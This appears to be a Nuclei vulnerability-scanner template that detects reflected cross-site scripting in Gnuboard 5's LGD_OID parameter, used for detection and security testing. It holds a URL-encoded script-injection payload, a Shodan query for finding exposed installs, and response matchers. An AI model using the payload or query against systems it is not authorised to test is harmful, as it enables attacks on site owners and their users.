id: gnuboard5-rxss

info:
  name: Gnuboard 5 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Gnuboard 5 contains a cross-site scripting vulnerability via the $_GET['LGD_OID'] parameter.
  reference:
    - https://huntr.dev/bounties/ed317cde-9bd1-429e-b6d3-547e72534dd5/
    - https://vulners.com/huntr/25775287-88CD-4F00-B978-692D627DFF04
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    shodan-query: http.html:"gnuboard5"
  tags: gnuboard,xss,huntr

requests:
  - method: GET
    path:
      - "{{BaseURL}}/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'LGD_OID = <script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/19
